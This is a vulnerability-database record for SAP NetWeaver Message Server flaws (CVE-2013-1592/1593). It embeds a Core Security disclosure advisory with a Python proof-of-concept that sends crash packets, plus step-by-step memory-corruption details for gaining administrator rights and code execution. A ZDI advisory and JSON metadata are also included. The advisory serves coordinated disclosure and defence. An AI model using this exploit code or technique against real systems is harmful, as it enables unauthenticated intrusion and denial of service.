"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Input Validation Error",
"sources": [
{
"db": "BID",
"id": "65547"
}
],
"trust": 0.3
}
}
var-202001-0833
Vulnerability from variot
A Denial of Service vulnerability exists in the WRITE_C function in the msg_server.exe module in SAP NetWeaver 2004s, 7.01 SR1, 7.02 SP06, and 7.30 SP04 when sending a crafted SAP Message Server packet to TCP ports 36NN and/or 39NN. SAP NetWeaver Contains an array index validation vulnerability.Denial of service operation (DoS) May be in a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of SAP Netweaver ABAP. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msg_server.exe listening on 3900 by default. When the msg_server parses a message with opcode 0x43 and sub-opcode 0x04 it uses a user suplied size field to copy a string into a static sized stack buffer. The resulting buffer overflow can lead to remote code execution under the context of the process. Authentication is not required to exploit this vulnerability.The specific flaw exists within the way SAP NetWeaver handles packages with opcode 0x43. If a package with sub opcode 0x4 contains a long parameter value string NetWeaver will eventually write a \x00 byte onto the stack to mark the end of the string. SAP NetWeaver has a defect in the message with the opcode 0x43. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Msg_server.exe listens to port 3900 by default. Arbitrary code. Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or cause denial-of-service conditions. The following products are affected: SAP Netweaver 2004s SAP Netweaver 7.01 SR1 SAP Netweaver 7.02 SP06 SAP Netweaver 7.30 SP04. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/
CORE-2012-1128
- Advisory Information
Title: SAP Netweaver Message Server Multiple Vulnerabilities Advisory ID: CORE-2012-1128 Advisory URL: http://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities Date published: 2013-02-13 Date of last update: 2013-02-13 Vendors contacted: SAP Release mode: Coordinated release
- Vulnerability Information
Class: Improper Validation of Array Index [CWE-129], Buffer overflow [CWE-119] Impact: Code execution, Denial of service Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-1592, CVE-2013-1593
-
By sending different messages, the different vulnerabilities can be triggered.
-
Vulnerable packages
. Older versions are probably affected too, but they were not checked.
- Non-vulnerable packages
. Vendor did not provide this information.
- Vendor Information, Solutions and Workarounds
SAP released the security note 1800603 [2] regarding these issues.
- Credits
Vulnerability [CVE-2013-1592] was discovered by Martin Gallo and Francisco Falcon, and additional research was performed by Francisco Falcon. Vulnerability [CVE-2013-1593] was discovered and researched by Martin Gallo from Core Security Consulting Services. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team.
- Technical Description / Proof of Concept Code
The following python script is the main PoC that can be used to reproduce all vulnerabilities described below:
/----- import socket, struct from optparse import OptionParser
Parse the target options
parser = OptionParser() parser.add_option("-d", "--hostname", dest="hostname", help="Hostname", default="localhost") parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3900) (options, args) = parser.parse_args()
client_string = '-'+' '39 server_name = '-'+' '39
def send_packet(sock, packet): packet = struct.pack("!I", len(packet)) + packet sock.send(packet)
def receive(sock): length = sock.recv(4) (length, ) = struct.unpack("!I", length) data = "" while len(data)<length: data+= sock.recv(length) return (length, data)
def initialize_connection(hostname, port):
# Connect
print "[*] Connecting to", hostname, "port", port
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((hostname, port))
# Send initialization packet
print "[*] Conected, sending login request"
init = '**MESSAGE**\x00' # eyecatcher
init+= '\x04' # version
init+= '\x00' # errorno
init+= client_string # toname
init+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' #
msgtype/reserved/key init+= '\x01\x08' # flag / iflag (MS_LOGIN_2) init+= client_string # fromname init+= '\x00\x00' # padd send_packet(connection, init)
# Receive response
print "[*] Receiving login reply"
(length, data) = receive(connection)
# Parsing login reply
server_name = data[4+64:4+64+40]
return connection
Main PoC body
connection = initialize_connection(options.hostname, options.port) send_attack(connection)
-----/
In the following subsections, we give the python code that can be added after the script above in order to reproduce all vulnerabilities.
8.1. Malicious packets are processed by the vulnerable function '_MsJ2EE_AddStatistics' in the 'msg_server.exe' module.
The vulnerable function '_MsJ2EE_AddStatistics' receives a pointer to a 'MSJ2EE_HEADER' struct as its third parameter, which is fully controlled by the attacker. This struct type is defined as follows:
/----- 00000000 MSJ2EE_HEADER struct ; (sizeof=0x28, standard type) 00000000 senderclusterid dd ? 00000004 clusterid dd ? 00000008 serviceid dd ? 0000000C groupid dd ? 00000010 nodetype db ? 00000011 db ? ; undefined 00000012 db ? ; undefined 00000013 db ? ; undefined 00000014 totallength dd ? 00000018 currentlength dd ? 0000001C currentoffset dd ? 00000020 totalblocks db ? 00000021 currentblock db ? 00000021 00000022 db ? ; undefined 00000023 db ? ; undefined 00000024 messagetype dd ? 00000028 MSJ2EE_HEADER ends -----/ The '_MsJ2EE_AddStatistics' function uses the 'serviceid' field of the 'MSJ2EE_HEADER' to calculate an index to write into the 'j2ee_stat_services' global array, without properly validating that the index is within the boundaries of the array. On the other hand, 'j2ee_stat_services' is a global array of 256 elements of type 'MSJ2EE_STAT_ELEMENT':
/----- .data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256] .data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>) .data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o .data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ...
-----/ This vulnerability can be used to corrupt arbitrary memory with arbitrary values, with some restrictions. The following snippet shows the vulnerable code within the '_MsJ2EE_AddStatistics' function:
/----- mov edi, [ebp+pJ2eeHeader] mov eax, [edi+MSJ2EE_HEADER.serviceid] ;attacker controls MSJ2EE_HEADER.serviceid xor ecx, ecx cmp dword ptr j2ee_stat_total.totalMsgCount+4, ecx lea esi, [eax+eax8] lea esi, j2ee_stat_services.totalMsgCount[esi8] ;using the index without validating array bounds
-----/ Since the 'serviceid' value is first multiplied by 9 and then it is multiplied by 8, the granularity of the memory addresses that can be targeted for memory corruption is 0x48 bytes, which is the size of the 'MSJ2EE_STAT_ELEMENT' struct:
/----- 00000000 MSJ2EE_STAT_ELEMENT struc ; (sizeof=0x48, standard type) 00000000 ; XREF: .data:j2ee_stat_totalr 00000000 ; .data:j2ee_stat_servicesr 00000000 totalMsgCount dq ? ; XREF: _MsJ2EE_AddStatistics+1Br 00000000 ; _MsJ2EE_AddStatistics+2Fr ... 00000008 totalMsgLength dq ? ; XREF: _MsJ2EE_AddStatistics+192r 00000008 ; _MsJ2EE_AddStatistics+19Br ... 00000010 avgMsgLength dq ? ; XREF: _MsJ2EE_AddStatistics+1C2w 00000010 ; _MsJ2EE_AddStatistics+1C7w ... 00000018 maxLength dq ? ; XREF: _MsJ2EE_AddStatistics+161r 00000018 ; _MsJ2EE_AddStatistics+16Er ... 00000020 noP2PMessage dq ? ; XREF: _MsJ2EE_AddStatistics:loc_44D442w 00000020 ; _MsJ2EE_AddStatistics+158w ... 00000028 noP2PRequest dq ? ; XREF: _MsJ2EE_AddStatistics+144w 00000028 ; _MsJ2EE_AddStatistics+14Aw ... 00000030 noP2PReply dq ? ; XREF: _MsJ2EE_AddStatistics+132w 00000030 ; _MsJ2EE_AddStatistics+138w ... 00000038 noBroadcastMessage dq ? ; XREF: _MsJ2EE_AddStatistics:loc_44D40Dw 00000038 ; _MsJ2EE_AddStatistics+123w ... 00000040 noBroadcastRequest dq ? ; XREF: _MsJ2EE_AddStatistics+10Fw 00000040 ; _MsJ2EE_AddStatistics+115w ... 00000048 MSJ2EE_STAT_ELEMENT ends
-----/ However, it is possible to use different combinations of the 'flag/iflag' values in the Message Server packet to gain more precision over the memory addresses that can be corrupted. Different combinations of 'flag/iflag' values provide different memory corruption primitives, as shown below:
/----- At this point: * ESI points to an arbitrary, attacker-controlled memory address * EBX == 1
.text:0044D359 movzx eax, [ebp+msiflag] .text:0044D35D sub eax, 0Ch .text:0044D360 jz short loc_44D37C .text:0044D362 sub eax, ebx .text:0044D364 jnz short loc_44D39D .text:0044D366 cmp [ebp+msflag], 2 .text:0044D36A jnz short loc_44D374 .text:0044D36C add [esi+40h], ebx ; iflag=0xd, flag=2 => add 1 to [esi+0x40] .text:0044D36F adc [esi+44h], ecx .text:0044D372 jmp short loc_44D39D .text:0044D374 ;
.text:0044D374 .text:0044D374 loc_44D374: ; CODE XREF: _MsJ2EE_AddStatistics+7Aj .text:0044D374 add [esi+38h], ebx ; iflag=0xd, flag=1 => add 1 to [esi+0x38] .text:0044D377 adc [esi+3Ch], ecx .text:0044D37A jmp short loc_44D39D .text:0044D37C ;
.text:0044D37C .text:0044D37C loc_44D37C: ; CODE XREF: _MsJ2EE_AddStatistics+70j .text:0044D37C mov al, [ebp+msflag] .text:0044D37F cmp al, 3 .text:0044D381 jnz short loc_44D38B .text:0044D383 add [esi+30h], ebx ; iflag=0xc, flag=3 => add 1 to [esi+0x30] .text:0044D386 adc [esi+34h], ecx .text:0044D389 jmp short loc_44D39D .text:0044D38B ;
.text:0044D38B .text:0044D38B loc_44D38B: ; CODE XREF: _MsJ2EE_AddStatistics+91j .text:0044D38B cmp al, 2 .text:0044D38D jnz short loc_44D397 .text:0044D38F add [esi+28h], ebx ; iflag=0xc, flag=2 => add 1 to [esi+0x28] .text:0044D392 adc [esi+2Ch], ecx .text:0044D395 jmp short loc_44D39D .text:0044D397 ;
.text:0044D397 .text:0044D397 loc_44D397: ; CODE XREF: _MsJ2EE_AddStatistics+9Dj .text:0044D397 add [esi+20h], ebx ; iflag=0xc, flag=1 => add 1 to [esi+0x20] .text:0044D39A adc [esi+24h], ecx
[...]
-----/ And the following code excerpt is always executed within the '_MsJ2EE_AddStatistics' function, providing two more memory corruption primitives:
/----- .text:0044D3B7 add [esi], ebx ;add 1 to [esi] .text:0044D3B9 adc dword ptr [esi+4], 0 .text:0044D3BD mov eax, [edi+MSJ2EE_HEADER.totallength] ;MSJ2EE_HEADER.totallength is fully controlled by the attacker .text:0044D3C0 cdq .text:0044D3C1 add [esi+8], eax ;add an arbitrary number to [esi+8]
-----/ This memory corruption vulnerability can be used by remote unauthenticated attackers to execute arbitrary code on vulnerable installations of SAP Netweaver, but it can also be abused to modify the internal state of the vulnerable service in order to gain administrative privileges within the SAP Netweaver Message Server.
A client connected to the Message Server may have administrative privileges or not. The Message Server holds a structure of type 'MSADM_s' for each connected client, which contains information about that very connection. Relevant parts of the 'MSADM_s' struct type are shown below:
/----- 00000000 MSADM_s struc ; (sizeof=0x538, standard type) 00000000 ; XREF: .data:dummy_clientr 00000000 client_type dd ? ; enum MS_CLIENT_TYPE 00000004 stat dd ? ; enum MS_STAT 00000008 connection_ID dd ? 0000000C status db ? 0000000D dom db ? ; XREF: MsSFillCon+3Cw 0000000E admin_allowed db ? 0000000F db ? ; undefined 00000010 name dw 40 dup(?) [...] 00000534 _padding db 4 dup(?) 00000538 MSADM_s ends
-----/ The 'admin_allowed' field at offset 0x0E is a boolean value that indicates whether the connected client has administrative privileges or not. When a new client connects, the 'MsSLoginClient' function of the Message Server sets the proper value for the 'admin_allowed' field in the 'MSADM_s' struct instance associated with that client:
/----- .text:004230DC loc_4230DC: ; CODE XREF: MsSLoginClient+AAAj .text:004230DC ; MsSLoginClient+B26j .text:004230DC cmp byte ptr [edi+0Eh], 0 ; privileged client? .text:004230E0 jnz short loc_4230EA ; if yes, jump .text:004230E2 mov al, byte ptr ms_admin_allowed ; otherwise, grab the value of the "ms_admin_allowed" global variable... .text:004230E7 mov [edi+0Eh], al ; ...and save it to MSADM_s.admin_allowed
-----/ So if we manage to overwrite the value of the 'ms_admin_allowed' global variable with a value different than 0, then we can grant administrative privileges to our unprivileged connections. In SAP Netweaver 'msg_server.exe' v7200.70.18.23869, the 'ms_admin_allowed' global variable is located at '0x008f17f0':
/----- .data:008F17F0 ; int ms_admin_allowed .data:008F17F0 ms_admin_allowed dd ? ; DATA XREF: MsSSetMonitor+7Ew .data:008F17F0 ; MsSLoginClient+B62r
-----/ And the 'j2ee_stat_services' global array, which is the array that can be indexed outside its bounds, is located at '0x0090b9e0':
/----- .data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256] .data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>) .data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o .data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ...
-----/ So, by providing 'MSJ2EE_HEADER.serviceid == 0x038E3315', we will be targeting '0x008F17C8' as the base address for memory corruption. Having in mind the different memory corruption primitives based on combinations of 'flag/iflag' fields described above, by specifying 'iflag == 0xC' and 'flag == 0x2' in our Message Server packet we will be able to add 1 to '[0x008F17C8+0x28]', effectively overwriting the contents of '0x008F17F0' ('ms_admin_allowed'). After overwriting 'ms_admin_allowed', all of our future connections will have administrative privileges within the Message Server.
After gaining administrative privileges for our future connections, there are at least two possible paths of exploitation:
- Of course it is not mandatory to have administrative privileges in order to overwrite function pointers, but considering the limitation of targetable addresses imposed by the little granularity of the memory corruption, some of the most handy-to-exploit function pointers happened to be accessible just for administrative connections.
- Modify the configuration and behavior of the server. That includes changing Message Server's runtime parameters and enabling Monitor Mode in the affected server.
8.1.1. Gaining remote code execution by overwriting function pointers
Having in mind that the granularity of the memory addresses that can be targeted for memory corruption is not that flexible (0x48 bytes) and the limited memory corruption primitives available, it takes some effort to find a function pointer that can be overwritten with a useful value and which can be later triggered with a network packet.
One possibility is to overwrite one of the function pointers which are in charge of handling the modification of Message Server parameters:
/----- .data:0087DED0 ; SHMPRF_CHANGEABLE_PARAMETER ms_changeable_parameter[58]
; function pointers associated to the modification of the "ms/max_sleep"
parameter
.data:0087DED0 ms_changeable_parameter SHMPRF_CHANGEABLE_PARAMETER
; function pointers associated to the modification of the "ms/max_vhost" parameter .data:0087DED0 SHMPRF_CHANGEABLE_PARAMETER <offset aMsMax_vhost, \ .data:0087DED0 offset MsSTestInteger, \ ;<-- we can overwrite this one .data:0087DED0 offset MsSSetMaxVirtHost>
[...]
-----/ By providing 'MSJ2EE_HEADER.serviceid == 0x038E1967' we can target '0x0087DED8' as the base address for memory corruption. In this case we can use the memory corruption primitive at address '0x0044D3C1' that always gets executed, which will allow us to add an arbitrary number (the value of 'MSJ2EE_HEADER.totallength') to '[0x0087DED8+8]' effectively overwriting the function pointer shown above ('ms_changeable_parameter[1].set').
After that we need to send a 'MS_SET_PROPERTY' request, specifying 'ms/max_vhost' as the name of the property to be changed. This 'MS_SET_PROPERTY' packet will make our overwritten function pointer to be called from the 'MsSChangeParam' function:
/----- .text:00404DB3 loc_404DB3: ; CODE XREF: MsSChangeParam+CDj .text:00404DB3 lea esi, [edi+edi*2] .text:00404DB6 mov edi, [ebp+pvalue] .text:00404DB9 add esi, esi .text:00404DBB mov edx, ms_changeable_parameter.test[esi+esi] .text:00404DC2 add esi, esi .text:00404DC4 push edi .text:00404DC5 push pname .text:00404DC6 call edx ; call our overwritten function pointer
-----/ 'MS_SET_PROPERTY' packets will be ignored by the Message Server if the requesting client does not have administrative privileges, so it is necessary to gain administrative privileges as explained above before using the memory corruption vulnerability to overwrite one of the function pointers in the 'ms_changeable_parameter' global array.
8.1.2. Modify the configuration and behavior of the server
After gaining administrative privileges for our connections, it is possible to perform 'MS_SET_PROPERTY' packets against the Message Server in order to modify its configuration and behavior. That makes possible, for example, to add virtual hosts to the load balancer, or to enable Monitor Mode [3] (transaction SMMS) on the affected server. Enabling Monitor Mode takes two steps:
- Send a 'MS_SET_PROPERTY' packet with property 'name == "ms/monitor"', property 'value == 1'.
- Send a 'MS_SET_PROPERTY' packet with property 'name == "ms/admin_port"', property 'value == 3535' (or any other arbitrary port number).
The following python code can be used to trigger the vulnerability:
/----- def send_attack(connection): print "[] Sending crash packet" crash = 'MESSAGE*\x00' # eyecatcher crash+= '\x04' # version crash+= '\x00' # errorno crash+= server_name # toname crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key crash+= '\x04\x0d' # flag/iflag crash+= client_string # fromname crash+= '\x00\x00' # padd
crash+=
"ABCDEFGH"+"\x01\x00\x00\x00"+"MNOPQRSTUVWXYZ0123"+"\x01"+"56789abcd" crash+= "\x00\x00\x00\x01" crash+= "\xff\xff\xff\xff" crash+= "\x00\x00\x00\x00" send_packet(connection, crash)
print "[*] Crash sent !"
-----/
8.2. Malicious packets are processed by the vulnerable function 'WRITE_C' in the 'msg_server.exe' module.
The following python code can be used to trigger the vulnerability:
/----- def send_attack(connection): print "[] Sending crash packet" crash = 'MESSAGE*\x00' # eyecatcher crash+= '\x04' # version crash+= '\x00' # errorno crash+= server_name # toname crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key crash+= '\x04\x05' # flag/iflag crash+= client_string # fromname crash+= '\x00\x00' # padd
crash+= "AD-EYECATCH\x00"
crash+= "\x01\x01"
crash+= "%11d" % 104
crash+= "%11d" % 1
crash+= "\x15\x00\x00\x00"
crash+= "\x20\x00\x00\xc8"
crash+= "LALA" + ' '*(20-4)
crash+= "LOLO" + ' '*(40-4)
crash+= " "*36
send_packet(connection, crash)
print "[*] Crash sent !"
-----/
- Report Timeline . 2012-12-10: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for January 22nd,
-
2012-12-10: Core sends an advisory draft with technical details and a PoC. 2012-12-11: The SAP team confirms the reception of the issue. 2012-12-21: SAP notifies that they concluded the analysis of the reported issues and confirms two out of the five vulnerabilities. Vendor also notifies that the other three reported issues were already fixed in February, 2012. Vendor also notifies that the necessary code changes are being done and extensive tests will follow. The corresponding security note and patches are planned to be released on the Security Patch Day in Feb 12th 2013. 2012-12-21: Core re-schedules the advisory publication for Feb 12th, 2013. 2012-12-28: SAP notifies Core that they will be contacted if tests fails in order to re-schedule the advisory publication. 2013-01-22: First release date missed. 2013-01-28: SAP notifies that they are still confident with releasing a security note and patches on Feb 12th as planned. 2013-01-29: Core acknowledges receiving the information and notifies that everything is ready for public disclosing on Feb 12th. Core also asks additional information regarding the patched vulnerabilities mentioned in [2012-12-21], including links to security bulletin, CVEs, and patches in order to verify if those patches effectively fix the reported flaws. 2013-02-01: SAP notifies that the patched vulnerabilities mentioned in [2012-12-21] were reported in [5] and no CVE were assigned to them. Those vulnerabilities seems to be related to ZDI advisories [6], [7], [8]. 2013-02-06: Core notifies that the patched vulnerabilities will be removed from the advisory and asks additional information regarding the affected and patched version numbers. 2013-02-01: SAP notifies that the security note 1800603 will be released and that note will provide further information regarting this vulnerability. 2013-02-13: Advisory CORE-2012-1128 published.
-
References
[1] http://www.sap.com/platform/netweaver/index.epx. [2] SAP Security note Feb 2013 https://service.sap.com/sap/support/notes/1800603. [3] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/bdc344cc104231e10000000a421937/content.htm.
[4] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/c2e782b8fd3020e10000000a42189d/frameset.htm.
[5] SAP Security notes Feb 2012 https//service.sap.com/sap/support/notes/1649840. [6] http://www.zerodayinitiative.com/advisories/ZDI-12-104/. [7] http://www.zerodayinitiative.com/advisories/ZDI-12-111/. [8] http://www.zerodayinitiative.com/advisories/ZDI-12-112/.
- About CoreLabs
CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security Technologies
Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.
- Disclaimer
The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
- PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
ZDI-12-104 : SAP Netweaver ABAP msg_server.exe Parameter Value Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-12-104 June 27, 2012
-
-- CVE ID:
-
-- CVSS: 10, AV:N/AC:L/Au:N/C:C/I:C/A:C
-
-- Affected Vendors: SAP
-
-- Affected Products: SAP NetWeaver
-
-- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 12407.
-
-- Vendor Response: SAP has issued an update to correct this vulnerability. More details can be found at: http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d1 0-eea7-ceb666083a6a#section40
-
-- Disclosure Timeline: 2011-10-28 - Vulnerability reported to vendor 2012-06-27 - Coordinated public release of advisory
-
-- Credit: This vulnerability was discovered by:
-
e6af8de8b1d4b2b6d5ba2610cbf9cd38
-
-- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is used. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi
-----BEGIN PGP SIGNATURE----- Version: PGP Desktop 10.2.0 (Build 1950) Charset: utf-8
wsBVAwUBT+spXFVtgMGTo1scAQLsaAf7BDBhaaXu2xrm0nKo4KXmCuA091M40I4t uAkVEE7Zb4eFCtth3tsGSExGqDJp5LKfMe+KNfXUHMWcju+khxep8qfwxhnrtK2E 1doQXQmrqCJunJLKwReEa5MpcZGsYyantq0kCczWf5ZYlzLEsSk51GEYfvHx7WrR XFTr4krClMcDxi9nOxNDr/CqqGxxQlDgBsMD3EyzVQ92PBG8kTZHUAJwBPqh7Ku3 JqBWzVKDVVEsGxe7dlG4fXKIaDlCHaHJmsAr7+1Uw/DmfDOaTQMLRLvdGHY9Vpm6 wGIQD/1eAW66eLSBOeWXiRNHcorXRwu/SxQP8zIESkmWLZwKfZqbMA== =t/ct -----END PGP SIGNATURE-----
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202001-0833",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": null,
"trust": 2.1,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "2004s"
},
{
"model": "netweaver abap",
"scope": null,
"trust": 1.2,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.01"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.01 sr1"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.02 sp06"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.30 sp04"
},
{
"model": "netweaver abap null",
"scope": "eq",
"trust": 0.4,
"vendor": "sap",
"version": "*"
},
{
"model": "netweaver 2004s",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"db": "CNVD",
"id": "CNVD-2012-3433"
},
{
"db": "BID",
"id": "57956"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007128"
},
{
"db": "NVD",
"id": "CVE-2013-1593"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.01:sr1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.02:sp06:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.30:sp04:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:2004s:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2013-1593"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "e6af8de8b1d4b2b6d5ba2610cbf9cd38",
"sources": [
{
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"db": "ZDI",
"id": "ZDI-12-104"
}
],
"trust": 2.1
},
"cve": "CVE-2013-1593",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.0,
